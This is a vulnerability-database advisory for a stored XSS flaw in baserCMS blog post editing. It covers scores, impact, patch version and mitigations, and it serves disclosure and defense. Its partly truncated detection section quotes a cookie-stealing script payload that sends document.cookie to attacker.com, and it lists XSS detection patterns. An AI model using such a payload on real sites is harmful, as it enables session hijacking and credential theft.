
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-30879 is a stored cross-site scripting (XSS) vulnerability in the blog post functionality of baserCMS, a PHP-based website development framework. It affects baserCMS versions 5.2.2 and earlier (specifically noted to target 5.2.1 and earlier), and was patched in version 5.2.3. The advisory was published on March 30–31, 2026, with the fix released on March 26, 2026. It carries a CVSS v3.1 base score of 6.1 (Medium) and a CVSS v4.0 base score of 6.9 (Medium) (GitHub Advisory, baserproject Advisory). The vulnerability was discovered by Gai Tanaka of Mitsui Bussan Secure Directions, Inc. and is tracked under JVN#20837860 (GitHub Advisory).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), arising from insufficient sanitization of user-supplied input in the blog post editing feature of baserCMS (GitHub Advisory). An attacker with the ability to create or edit blog posts can inject malicious JavaScript that is subsequently stored and rendered in the browsers of users who view the affected blog content. No special privileges or complex preconditions are required beyond access to the blog post creation/editing interface, and no public proof-of-concept exploit code has been identified (Feedly).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the browsers of site visitors who view the compromised blog post, potentially leading to session hijacking, credential theft, page defacement, malware distribution, or redirection to malicious sites. The impact is limited to confidentiality and integrity at a low level on the vulnerable system, with no direct availability impact and no propagation to subsequent systems (GitHub Advisory, baserproject Advisory). The attack can be performed remotely over the network without requiring victim interaction beyond simply viewing the affected blog page.
No public proof-of-concept exploit code has been identified, and there is no evidence of active in-the-wild exploitation as of the time of disclosure (Feedly). The EPSS score is approximately 0.013% (2nd percentile), indicating a low near-term probability of exploitation (GitHub Advisory). The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog, and no threat actor attribution has been reported.
<script>document.location='https://attacker.com/steal?c='+document.cookie</script> or similar XSS payloads within the post body or title./baser/admin/bc-blog/blog-posts/edit/*) containing encoded script tags or JavaScript event handlers.<script>, javascript:, onerror=, onload=, or other JavaScript injection patterns in post body or title fields.The primary remediation is to update baserCMS to version 5.2.3 or later, which contains the security fix for this vulnerability (baserproject Release, GitHub Advisory). As interim mitigations, administrators should restrict blog post creation and editing permissions to trusted users only, and implement Content Security Policy (CSP) HTTP headers to reduce the impact of any XSS execution. Existing blog posts should be audited for suspicious JavaScript content and sanitized as needed (Feedly).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."